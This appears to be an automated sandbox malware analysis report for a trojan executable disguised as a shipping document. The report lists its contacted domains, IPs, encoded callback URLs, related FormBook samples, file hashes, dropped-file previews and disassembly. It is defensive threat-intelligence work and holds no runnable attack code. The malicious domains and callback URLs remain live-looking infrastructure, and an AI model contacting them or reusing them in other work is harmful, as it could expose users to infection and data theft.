https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.independent200.org/yl6y/?3vHty=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&fx=kLn8bpp8IVh	0%	Avira URL Cloud	safe
http://www.masteriocp.online/p5rq/	0%	Avira URL Cloud	safe
http://www.independent200.org/yl6y/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.mediaplug.biz/osde/	0%	Avira URL Cloud	safe
http://www.tigre777gg.online	0%	Avira URL Cloud	safe
http://www.mediaplug.biz/osde/?3vHty=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&fx=kLn8bpp8IVh	0%	Avira URL Cloud	safe
http://www.independent200.org/yl6y/	2%	Virustotal		Browse
https://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4	0%	Avira URL Cloud	safe
http://www.tigre777gg.online	1%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.masteriocp.online/p5rq/	2%	Virustotal		Browse
http://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&fx=kLn8bpp8IVh	0%	Avira URL Cloud	safe
http://www.chamadaslotgiris.net/gqyt/?3vHty=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&fx=kLn8bpp8IVh	0%	Avira URL Cloud	safe
http://www.mediaplug.biz/osde/	2%	Virustotal		Browse
http://www.tigre777gg.online/06rp/	0%	Avira URL Cloud	safe
http://www.tigre777gg.online/06rp/	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.independent200.org	103.42.108.46	true	true	1%, Virustotal, Browse	unknown
chamadaslotgiris.net	3.33.130.190	true	true	3%, Virustotal, Browse	unknown
dns.ladipage.com	13.228.81.39	true	true	0%, Virustotal, Browse	unknown
tigre777gg.online	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
www.mediaplug.biz	66.81.203.135	true	true	0%, Virustotal, Browse	unknown
www.linkbasic.net	unknown	unknown	true		unknown
www.masteriocp.online	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.chamadaslotgiris.net	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tigre777gg.online	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.masteriocp.online/p5rq/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.independent200.org/yl6y/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.independent200.org/yl6y/?3vHty=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&fx=kLn8bpp8IVh	true	Avira URL Cloud: safe	unknown
http://www.mediaplug.biz/osde/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mediaplug.biz/osde/?3vHty=RWxN1EBNqsrI97geHJKF+m1NqN4D5Qwm3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sJReZCD/pggQ9SZws5yKjtGx+wP+UoHuai7o=&fx=kLn8bpp8IVh	true	Avira URL Cloud: safe	unknown
http://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5H28EY01DAN4ct7k9yl5pOX5UKp3K5dMEiwU=&fx=kLn8bpp8IVh	true	Avira URL Cloud: safe	unknown
http://www.chamadaslotgiris.net/gqyt/?3vHty=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&fx=kLn8bpp8IVh	true	Avira URL Cloud: safe	unknown
http://www.tigre777gg.online/06rp/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tigre777gg.online	tfTpvPSAdwQ.exe, 00000007.00000002.3125347091.0000000004BB3000.00000040.80000000.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.masteriocp.online/p5rq/?3vHty=RytyLV2sDE3KAjiSkyiXOnQjrJMqpEw2xv60Q0DZuFoqqvUh/Zvb/zR4	netbtugc.exe, 00000006.00000002.3124808735.0000000003A38000.00000004.10000000.00040000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3124031498.0000000002E38000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000006.00000003.2587337718.00000000072A8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.228.81.39	dns.ladipage.com	United States	16509	AMAZON-02US	true
66.81.203.135	www.mediaplug.biz	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
103.42.108.46	www.independent200.org	Australia	45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	true
3.33.130.190	chamadaslotgiris.net	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1511837
Start date and time:	2024-09-16 14:07:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping report#Cargo Handling.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@6/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 43 Number of non-executed functions: 305
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
08:09:44	API Interceptor	810184x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.228.81.39	PO76389.exe	Get hash	malicious	FormBook	Browse	www.masteriocp.online/p5rq/
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	www.masteriocp.online/p5rq/
	SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe	Get hash	malicious	FormBook	Browse	www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
	z11SOAAUG2408.exe	Get hash	malicious	FormBook	Browse	www.masteriocp.online/p5rq/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.masteriocp.online/wg84/
	Proforma_Invoice.pif.exe	Get hash	malicious	FormBook	Browse	www.againbeautywhiteskin.asia/3h10/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.againbeautywhiteskin.asia/3h10/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.againbeautywhiteskin.asia/3h10/
	ORDER TKHA-A88163341B.bat.exe	Get hash	malicious	FormBook	Browse	www.againbeautywhiteskin.asia/3h10/
	Purchase Order #PO-240902.vbs	Get hash	malicious	FormBook	Browse	www.hisako.store/55sn/
66.81.203.135	Jsn496Em5T.exe	Get hash	malicious	FormBook	Browse	www.mediaplug.biz/13ne/
66.81.203.135	DN.exe	Get hash	malicious	FormBook	Browse	www.mediaplug.biz/osde/
103.42.108.46	PO76389.exe	Get hash	malicious	FormBook	Browse	www.independent200.org/yl6y/
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	www.independent200.org/yl6y/
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	www.independent200.org/yl6y/
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	www.independent200.org/yl6y/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr
	Scan 00093847.exe	Get hash	malicious	FormBook	Browse	www.mbwd.store/pn1r/
	LKkVS1VFJD.exe	Get hash	malicious	FormBook	Browse	www.independent200.org/peuo/
	rRFQ.bat.exe	Get hash	malicious	FormBook	Browse	www.mbwd.store/bmmx/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.mbwd.store/pn1r/
	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Get hash	malicious	FormBook	Browse	www.mtmoriacolives.store/bkj6/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dns.ladipage.com	PO76389.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Scan 00093847.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	z11SOAAUG2408.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	13.228.81.39
	DN.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
www.mediaplug.biz	PO76389.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	Jsn496Em5T.exe	Get hash	malicious	FormBook	Browse	66.81.203.135
	6i4QCFbsNi.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	z11SOAAUG2408.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	DN.exe	Get hash	malicious	FormBook	Browse	66.81.203.135
	Filename.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	66.81.203.200
www.independent200.org	PO76389.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	LKkVS1VFJD.exe	Get hash	malicious	FormBook	Browse	103.42.108.46

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	Giger & Partner Fall Nr. 893983 Gerichtsbescheid Vergleich Nr. 241624 GM.pdf	Get hash	malicious	Unknown	Browse	3.73.220.23
	https://www.cossuel.sn/css/	Get hash	malicious	Unknown	Browse	13.224.189.17
	https://www.opinionstage.com/page/6a06cc0f-a3ad-4dd0-b63e-a28e85b63ba2	Get hash	malicious	Unknown	Browse	13.224.189.74
	https://wetransfer.com/downloads/fba8446149d20edcdcf37d63699c300320240916111055/9e1e4e941b3d5baf51e58ce4afc08bf520240916111122/d348f9?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid	Get hash	malicious	Unknown	Browse	13.224.189.126
	https://vente-directe-dv.com/	Get hash	malicious	Unknown	Browse	18.245.86.90
	PO76389.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	Petronas request for-quotation.exe	Get hash	malicious	FormBook	Browse	54.170.150.206
	https://www.pobretv.makeup/ptr	Get hash	malicious	Phisher	Browse	65.9.7.186
	https://links.rasa.io/v1/t/eJx1kM9ygjAQxl_F4VwkQCjgqS9QT71nlmS1sUKY3USHcXz3AlU8aK_Z3_cn3yUKdIw2q-jb-543ScJIJ6TWdWvCk2MP-metXZsw6SR6W0UtejDgYdRcInaBNE7yLZ75iN4jPUHYgp0jDFgetOvOMEghP_bT--Q9KQgYVIvMsEflh34xbcji7gvZf_4dF5hDc0Dt1aPDaNWGzvpBjSE7uw8E3rruTi7KB2fNpKvLMgeR7uK0MDJuSm1iyATEMq9FXr3rrJHVU0fGzqjxj3NyJjIZizoWcuEItSNzS0iLKi_ysnpRoUfiseM_3D2NwoLkaZ2Wohb1a4g54A3dum6eCxrlxwGV66c5lsv1ev0FnZaojQ==#bWNpbnR5cmVyQGJlaW4ubmV0	Get hash	malicious	HTMLPhisher	Browse	13.224.189.39
	https://auwebship.inxpress.com/imcs_au/shipment/tracking/by/airbill/view?airbillNumber=Q9TZ50011449	Get hash	malicious	Unknown	Browse	13.237.239.167
SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	PO76389.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	Scan 00093847.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	103.27.32.30
	LKkVS1VFJD.exe	Get hash	malicious	FormBook	Browse	103.42.108.46
	http://www.greenprintlandscapes.com.au	Get hash	malicious	Unknown	Browse	110.232.143.97
	http://fslink.megnagroup.com.au/email/track/click?hash=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7Im11c3RoIjoiaHR0cHM6Ly9tZWduYWdyb3VwLmNvbS5hdS8iLCJsaW9uIjoiNzVkNGMiLCJnb3JpbGxhIjoiYmE1MDZjM2NlIiwidGlnZXIiOiJmc2xpbmsubWVnbmFncm91cC5jb20uYXUifSwiaWF0IjoxNzI0OTg3NTgyfQ.q2Cl712fuiOGcrrlV8jnMlRPUIhIoDJ0d2m4R_WTYLA~eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImhvcnNlIjoia2V2aW4uc21pdGhAc2FuaXRhcml1bS5jb20uYXUiLCJjYW1lbCI6ImJhNmM1MDlmZSJ9LCJpYXQiOjE3MjQ5ODc1ODJ9.KTlm-RKp1KYEIDipXUGHrWZz7AycFi0jesA9WqoLoig	Get hash	malicious	Unknown	Browse	110.232.143.78
CONFLUENCE-NETWORK-INCVG	PO76389.exe	Get hash	malicious	FormBook	Browse	66.81.203.200
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	r3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
	r9856_7.exe	Get hash	malicious	FormBook	Browse	208.91.197.13
	3T-ENQ-O-2024-10856.exe	Get hash	malicious	FormBook	Browse	66.81.203.10
	BCNFNjvJNq.exe	Get hash	malicious	ADWIND, Lokibot, Ramnit, Sality	Browse	204.11.56.48
	Jsn496Em5T.exe	Get hash	malicious	FormBook	Browse	66.81.203.135
	EGCS-875-S5-SMO M2A.exe	Get hash	malicious	FormBook	Browse	208.91.197.27
AMAZONEXPANSIONGB	https://wetransfer.com/downloads/fba8446149d20edcdcf37d63699c300320240916111055/9e1e4e941b3d5baf51e58ce4afc08bf520240916111122/d348f9?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid	Get hash	malicious	Unknown	Browse	52.223.40.198
	PO76389.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	PROFOMA INVOICE SHEET.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://multichainfix.pages.dev/chunks/patterns	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://nnwdryn4me2.typeform.com/to/vzxAdnuI?utm_source=www.thedeepview.co&utm_medium=newsletter&utm_campaign=u-s-hospital-teams-up-with-suki-for-an-ai-assistant&_bhlid=899a446fb8590c3f4dab42c864907d7822828cad	Get hash	malicious	Unknown	Browse	3.33.189.110
	k8FSEGGo4d9blGr.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://sucursalvpinvalidar-aqui10.weebly.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://web--start-ledgerlve.gitbook.io/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://nnwdryn4me2.typeform.com/to/vzxAdnuI?utm_source=www.thedeepview.co&utm_medium=newsletter&utm_campaign=u-s-hospital-teams-up-with-suki-for-an-ai-assistant&_bhlid=899a446fb8590c3f4dab42c864907d7822828cad	Get hash	malicious	Unknown	Browse	3.33.189.110
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	3.33.130.190

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\finitism

Download File

Process:	C:\Users\user\Desktop\Shipping report#Cargo Handling.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.99393439559586
Encrypted:	true
SSDEEP:	6144:N+9lMWWHrCC5YLmwdPgkBfS2UT7+4tdFDoOExV4:N+9WWKC1a+PRM+4rFeV4
MD5:	6882D2010191F7194D25DDC5009D22F0
SHA1:	2C92948B86D66BC90297C8A68B2F18B397317F68
SHA-256:	0983FF48F0ED6BCF2F805C4ADF8009D61B2D50B71E38FFABE1F9BEBF5CE4D90D
SHA-512:	8DD9BD125B498DBFDB91CC136A940B2AA67AA6819ABA90D8EC34CB6BDD97C26D44DA65251F20E824C335C669FE8E826256E43733C1CDB1B71144C214589AFEE6
Malicious:	false
Reputation:	low
Preview:	.....522N..A....d.V@..o6:..HHH6RZ1X7VCIVSG522NAHHH6RZ1X7V.IVSI.<N.A.i.S..yc>:v#5ZU@/,h+)X<5ExU3c;#=g\\....h%Y6?.U:\gIVSG5227@A.uV5..8P.~)1.]...t!/.R....8P.Y...{UU..(+ uV5.1X7VCIVS.p22.@IH...1X7VCIVS.503E@CHHdVZ1X7VCIVS'!22NQHHHFVZ1XwVCYVSG722HAHHH6RZ7X7VCIVSGE62NCHHH6RZ3Xw.CIFSG%22NAXHH&RZ1X7VSIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHfB7"EX7V..RSG%22N.LHH&RZ1X7VCIVSG522nAH(H6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7VCIVSG522NAHHH6RZ1X7V

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.473412359057103
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipping report#Cargo Handling.exe
File size:	1'719'296 bytes
MD5:	d930bdc12b0d6c17c9004c0dac1d1f5b
SHA1:	b118fc0a049a79e08a2df407ceb0de2871fe0c2e
SHA256:	15ff4bad6e829e4c628dd982b57687b73b514f2c42d3d08923b7d66bf2f78e80
SHA512:	915c7feaa8ab0957783d74661cd5cf35716b10d464b06da39d0aafda8dc2bf6d6511231c34d0ff4eaf4c5e77acbfbe101c0057d05e96d720ca353f2cae3ce6b7
SSDEEP:	24576:WqDEvCTbMWu7rQYlBQcBiT6rprG8adywb9m9wv8pLK/FFLw/INJMtUIRgZnl16fb:WTvC/MTQYxsWR7adxI9DpObUyJQWx6W
TLSH:	A985E10273C1D062FF9B92734B5AF6515BBC6A260123E61F13A81D79BD701B1463EBA3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E7708C [Sun Sep 15 23:41:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FBB4D06E083h
jmp 00007FBB4D06D98Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FBB4D06DB6Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FBB4D06DB3Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FBB4D07072Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FBB4D070778h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FBB4D070761h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xcd150	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a2000	0x7594	.reloc
